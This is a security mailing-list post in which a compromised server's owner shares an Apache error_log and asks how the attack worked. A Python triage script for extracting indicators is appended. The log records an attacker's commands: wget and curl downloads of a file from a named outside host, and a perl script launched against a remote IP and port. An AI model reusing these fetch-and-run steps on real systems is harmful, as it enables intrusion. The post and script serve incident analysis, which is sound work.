Security Basics mailing list archives
Analysis of an Apache log following a hack.
From: Gregory Boddin <gregory () g2f be>
Date: Tue, 10 Apr 2007 12:11:58 +0200
Hello, this is my first mail to the SecurityFocus mailing list. First, thanks for this community and for your attention.

My server was hacked 1 week ago, and I found this in the Apache error_log. The system was cleaned after that, but I want to know more about this. I think that someone used a buffer overflow in the httpd (Apache) server. Can you confirm that? Thank you very much for your answer. (Excuse my English, I am French.)

[APACHE ERROR LOG]
[Sun Apr 01 17:08:51 2007] [notice] Apache configured -- resuming normal operations
sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
sendmail: warning: command "/usr/sbin/postdrop -r" exited with status 11
sendmail: fatal: philippe@*****.be(48): unable to execute /usr/sbin/postdrop -r: Success
sendmail: fatal: No recipient addresses found in message header
[Mon Apr 02 12:42:58 2007] [error] server reached MaxClients setting, consider raising the MaxClients setting
Allowed memory size of 16777216 bytes exhausted (tried to allocate 8058880 bytes)
--00:05:36--  http://www.r00ting.org/b
           => `b'
Resolving www.r00ting.org... 200.226.246.22
Connecting to www.r00ting.org|200.226.246.22|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27,606 (27K) [text/plain]

    0K .......... .......... ......                          100%   41.93 KB/s

00:05:37 (41.93 KB/s) - `b' saved [27606/27606]

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 27606  100 27606    0     0   5315      0  0:00:05  0:00:05 --:--:-- 72383
sh: lynx: command not found
sh: fetch: command not found
--00:22:32--  http://www.r00ting.org/b
           => `b'
Resolving www.r00ting.org... 200.226.246.22
Connecting to www.r00ting.org|200.226.246.22|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27,606 (27K) [text/plain]

    0K .......... .......... ......                          100%   58.23 KB/s

00:22:34 (58.23 KB/s) - `b' saved [27606/27606]

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 27606  100 27606    0     0  33291      0 --:--:-- --:--:-- --:--:-- 60817
sh: lynx: command not found
sh: fetch: command not found
Undefined subroutine &main::getnick called at b line 304.
sh: line 1:  5148 Killed                  perl p 201.43.174.146 7171 120 2>&1 3>&1
[Tue Apr 03 10:47:11 2007] [notice] caught SIGTERM, shutting down
[Tue Apr 03 10:47:27 2007] [notice] Apache configured -- resuming normal operations
[Tue Apr 03 10:55:36 2007] [error] server reached MaxClients setting, consider raising the MaxClients setting
sh: /cd: No such file or directory
sh: /cd: No such file or directory
sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
sendmail: warning: command "/usr/sbin/postdrop -r" exited with status 11
sendmail: fatal: philippe@****.be(48): unable to execute /usr/sbin/postdrop -r: Success
sh: /cd: No such file or directory
sh: /cd: No such file or directory
sh: /cd: No such file or directory
[Thu Apr 05 15:18:35 2007] [warn] child process 10245 still did not exit, sending a SIGTERM
[Thu Apr 05 15:18:35 2007] [warn] child process 10246 still did not exit, sending a SIGTERM
[Thu Apr 05 15:20:56 2007] [notice] Apache configured -- resuming normal operations
[Thu Apr 05 16:10:09 2007] [error] server reached MaxClients setting, consider raising the MaxClients setting
sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
sendmail: warning: command "/usr/sbin/postdrop -r" exited with status 11
sendmail: fatal: philippe@****.be(48): unable to execute /usr/sbin/postdrop -r: Success
sendmail: fatal: No recipient addresses found in message header
sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
sendmail: warning: command "/usr/sbin/postdrop -r" exited with status 11
sendmail: fatal: philippe@****.be(48): unable to execute /usr/sbin/postdrop -r: Success
[Fri Apr 06 22:10:26 2007] [notice] caught SIGTERM, shutting down
[Fri Apr 06 22:45:56 2007] [notice] Apache configured -- resuming normal operations
[Fri Apr 06 23:50:46 2007] [error] server reached MaxClients setting, consider raising the MaxClients setting
sendmail: warning: premature end-of-input on /usr/sbin/postdrop -r while reading input attribute name
sendmail: warning: command "/usr/sbin/postdrop -r" exited with status 11
sendmail: fatal: philippe@****.be(48): unable to execute /usr/sbin/postdrop -r: Success
[Sun Apr 08 00:43:49 2007] [notice] caught SIGTERM, shutting down
[Sun Apr 08 00:48:00 2007] [notice] Apache configured -- resuming normal operations
[Sun Apr 08 02:52:34 2007] [error] server reached MaxClients setting, consider raising the MaxClients setting
[/APACHE ERROR LOG]

Thank you.
Greg
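Added example, not part of the original post or of any reply in the thread: a small Python triage script for an error_log like the one posted above. Apache writes its own entries in the `[date] [level] message` form; everything else in the file (the wget and curl transfer output, the `sh: ...: command not found` lines, the Perl error and the `Killed` line) is the stderr of processes the server itself spawned, so separating the two classes of line and pulling the values out of the second is the first thing a responder would do with this file. The sample lines are copied from the posted log; the indicator names, the regular expressions and the `triage`/`iocs` functions are mine.

```python
"""Triage an Apache error_log for signs that the web server process was made to
download and run something. Added example; not code from the original post."""
import re
from collections import Counter

# Constructed sample: lines lifted from the error_log posted above, one per line.
SAMPLE_LOG = """\
[Sun Apr 01 17:08:51 2007] [notice] Apache configured -- resuming normal operations
[Mon Apr 02 12:42:58 2007] [error] server reached MaxClients setting, consider raising the MaxClients setting
Allowed memory size of 16777216 bytes exhausted (tried to allocate 8058880 bytes)
--00:05:36--  http://www.r00ting.org/b
           => `b'
Resolving www.r00ting.org... 200.226.246.22
Connecting to www.r00ting.org|200.226.246.22|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27,606 (27K) [text/plain]
00:05:37 (41.93 KB/s) - `b' saved [27606/27606]
sh: lynx: command not found
sh: fetch: command not found
Undefined subroutine &main::getnick called at b line 304.
sh: line 1:  5148 Killed                  perl p 201.43.174.146 7171 120 2>&1 3>&1
sh: /cd: No such file or directory
"""

# Apache's own entries: "[Day Mon DD HH:MM:SS YYYY] [level] message".
APACHE_LINE = re.compile(r"^\[\w{3} \w{3} \d\d \d\d:\d\d:\d\d \d{4}\] \[(\w+)\]")

# Indicator patterns (names are mine). Each captures the values worth keeping.
INDICATORS = {
    "php_memory": re.compile(r"^Allowed memory size of (\d+) bytes exhausted"),
    "wget_fetch": re.compile(r"^--\d\d:\d\d:\d\d--\s+(https?://\S+)"),
    "resolved_host": re.compile(r"^Resolving (\S+?)\.{3} (\d{1,3}(?:\.\d{1,3}){3})"),
    "wget_saved": re.compile(r"`(.+?)' saved \[(\d+)/(\d+)\]"),
    "shell_missing_tool": re.compile(r"^sh: (\S+): command not found"),
    "shell_error": re.compile(r"^sh: (.+?): No such file or directory"),
    "perl_error": re.compile(r"^Undefined subroutine .* called at (\S+) line (\d+)"),
    "perl_run": re.compile(r"perl (\S+) (\d{1,3}(?:\.\d{1,3}){3}) (\d+)"),
    "process_killed": re.compile(r"^sh: line \d+:\s+(\d+) Killed"),
}


def triage(log_text):
    """Split the log into Apache's own entries (counted per level) and lines
    that came from spawned processes, and match the latter against INDICATORS.
    Returns {"levels": {...}, "foreign": [...], "hits": [(name, groups), ...]}."""
    levels = Counter()
    foreign = []
    hits = []
    for line in log_text.splitlines():
        m = APACHE_LINE.match(line)
        if m:
            levels[m.group(1)] += 1
            continue
        if not line.strip():
            continue
        foreign.append(line)
        for name, pat in INDICATORS.items():
            im = pat.search(line)
            if im:
                hits.append((name, im.groups()))
    return {"levels": dict(levels), "foreign": foreign, "hits": hits}


def iocs(report):
    """Network indicators (URL, hostname, IPs) from a triage() report, sorted."""
    out = set()
    for name, groups in report["hits"]:
        if name == "wget_fetch":
            out.add(groups[0])
        elif name == "resolved_host":
            out.update(groups)
        elif name == "perl_run":
            out.add(groups[1])          # address passed to the perl script
    return sorted(out)


if __name__ == "__main__":
    r = triage(SAMPLE_LOG)
    print("apache entries per level:", r["levels"])
    print("lines not written by apache:", len(r["foreign"]))
    for name, groups in r["hits"]:
        print(f"  {name}: {groups}")
    print("network IOCs:", iocs(r))
```

The script only says what ran and where it talked to; it cannot say how the attacker obtained execution, and an error_log never will. For that, the access_log entries from the minutes before each `--HH:MM:SS--` fetch line (00:05 and 00:22 on the night in question) are the place to look, and the saved file `b` and the script `p` are what to recover from a disk image if one was taken before the clean-up.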
Current thread:
- Analysis of an Apache log following a hack. Gregory Boddin (Apr 10)
- Re: Analysis of an Apache log following a hack. Santiago Barahona (Apr 11)